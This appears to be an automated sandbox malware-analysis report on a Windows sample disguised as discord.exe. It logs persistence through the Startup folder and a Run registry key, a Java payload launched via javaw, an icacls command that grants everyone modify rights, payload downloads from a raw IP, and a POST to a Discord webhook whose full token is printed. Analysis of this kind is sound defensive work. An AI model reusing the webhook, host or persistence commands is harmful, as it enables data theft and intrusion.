Source: javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
Source: javaw.exe, 00000001.00000002.530479660.000000000A743000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps
Source: javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.quovadisglobal.com/cps0
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000003.276572251.0000000006E11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
Source: uBZeAVcb6r.exe, 00000000.00000002.532067399.00000000080A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
Source: uBZeAVcb6r.exe, 00000000.00000002.527196154.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.00000000030AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canary.discord.com
Source: uBZeAVcb6r.exe, 00000000.00000000.257397775.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp, uBZeAVcb6r.exe, 00000000.00000002.527196154.0000000003141000.00000004.00000800.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000002.527196154.00000000031BE000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.0000000003031000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.00000000030AE000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000000.288794491.0000000000C42000.00000002.00000001.01000000.00000009.sdmpString found in binary or memory: https://canary.discord.com/api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwX
Source: uBZeAVcb6r.exe, 00000000.00000002.527196154.00000000031D5000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.00000000030AE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canary.discord.com4
Source: javaw.exe, 00000001.00000002.530479660.000000000A743000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009D3F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com
Source: javaw.exe, 00000001.00000002.525531594.00000000054CA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.530479660.000000000A82A000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000001.00000002.525531594.00000000054F5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AF5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.530153865.0000000009E23000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 0000000D.00000002.525212542.0000000004AC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: unknownHTTP traffic detected: POST /api/webhooks/1061591881189961839/KwqGODsud5jnEMwoLx_f6PdyZpFgjhKU-fUjwmwXiSSOBri5CuGLlgGvA4a7d18uh4zS HTTP/1.1Content-Type: application/jsonHost: canary.discord.comContent-Length: 62Expect: 100-continueConnection: Keep-Alive
Source: unknownDNS traffic detected: queries for: canary.discord.com
Source: global trafficHTTP traffic detected: GET /discord.exe HTTP/1.1Host: 23.94.99.119Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /discord.jar HTTP/1.1Host: 23.94.99.119
Source: global trafficHTTP traffic detected: GET /discord.exe HTTP/1.1Host: 23.94.99.119Connection: Keep-Alive
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.3:49685 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.3:49688 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.3:49690 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.3:49692 version: TLS 1.2
Source: uBZeAVcb6r.exe, 00000000.00000002.524157941.000000000135A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeCode function: 0_2_0131CD540_2_0131CD54
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeCode function: 0_2_0131F3500_2_0131F350
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeCode function: 0_2_0131F3400_2_0131F340
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 1_3_162082DF1_3_162082DF
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 1_3_162079EF1_3_162079EF
Source: uBZeAVcb6r.exe, 00000000.00000002.527196154.0000000003225000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsftEdit.DLL.MUIj% vs uBZeAVcb6r.exe
Source: uBZeAVcb6r.exe, 00000000.00000002.527196154.0000000003225000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs uBZeAVcb6r.exe
Source: uBZeAVcb6r.exe, 00000000.00000002.527196154.0000000003225000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: q,\\StringFileInfo\\040904B0\\OriginalFilename vs uBZeAVcb6r.exe
Source: uBZeAVcb6r.exe, 00000000.00000002.524157941.000000000135A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs uBZeAVcb6r.exe
Source: uBZeAVcb6r.exe, 00000000.00000002.527196154.00000000031B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamediscord.exe* vs uBZeAVcb6r.exe
Source: uBZeAVcb6r.exe, 00000000.00000000.257408460.0000000000BEA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamediscord.exe* vs uBZeAVcb6r.exe
Source: uBZeAVcb6r.exeVirustotal: Detection: 12%
Source: uBZeAVcb6r.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\uBZeAVcb6r.exe C:\Users\user\Desktop\uBZeAVcb6r.exe
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exe "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe "C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe "C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exe"
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar" Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)MJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeProcess created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe "C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe" -jar "C:\Users\user\AppData\Local\Temp\jarva.jar"
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile created: C:\Users\user\AppData\Local\Temp\jarva.jarJump to behavior
Source: classification engineClassification label: mal92.adwa.winEXE@15/4@4/4
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile read: C:\Users\desktop.iniJump to behavior
Source: uBZeAVcb6r.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5156:120:WilError_01
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeSection loaded: C:\Program Files (x86)\Java\jre1.8.0_211\bin\client\jvm.dllJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeFile read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile opened: C:\Windows\SysWOW64\en-US\MsftEdit.DLL.muiJump to behavior
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
Source: uBZeAVcb6r.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: uBZeAVcb6r.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: uBZeAVcb6r.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\akate\source\repos\MAHAServer\MAHA\obj\Debug\discord.pdb source: uBZeAVcb6r.exe, 00000000.00000002.527196154.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, uBZeAVcb6r.exe, 00000000.00000000.257397775.0000000000BE2000.00000002.00000001.01000000.00000003.sdmp, discord.exe, 00000009.00000002.526982695.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000000.288794491.0000000000C42000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: C:\Users\akate\source\repos\MAHAServer\MAHA\obj\Debug\discord.pdbR source: uBZeAVcb6r.exe, 00000000.00000002.527196154.00000000031B1000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000002.526982695.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, discord.exe, 00000009.00000000.288794491.0000000000C42000.00000002.00000001.01000000.00000009.sdmp
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeCode function: 0_2_0131C108 push es; ret 0_2_0131C10E
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeCode function: 0_2_0131CA20 push cs; ret 0_2_0131CA2E
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 1_3_161FCE2B pushad ; iretd 1_3_161FD02D
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 1_3_161FCE23 push eax; retf 1_3_161FCE25
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 1_3_161FCE58 pushad ; iretd 1_3_161FD02D
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 1_3_161FD47D pushad ; retf 1_3_161FD48D
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeCode function: 1_3_16200280 push cs; retn 0013h1_3_162002A4
Source: uBZeAVcb6r.exeStatic PE information: 0xF5B8D3D3 [Sat Aug 21 11:26:11 2100 UTC]

Persistence and Installation Behavior

barindex
Drops executable to a common third party application directory
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeFile written: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\discord.exeJump to dropped file

Boot Survival

barindex
Drops PE files to the startup folder
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeJump to dropped file
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DiscordJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run DiscordJump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\uBZeAVcb6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\discord.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
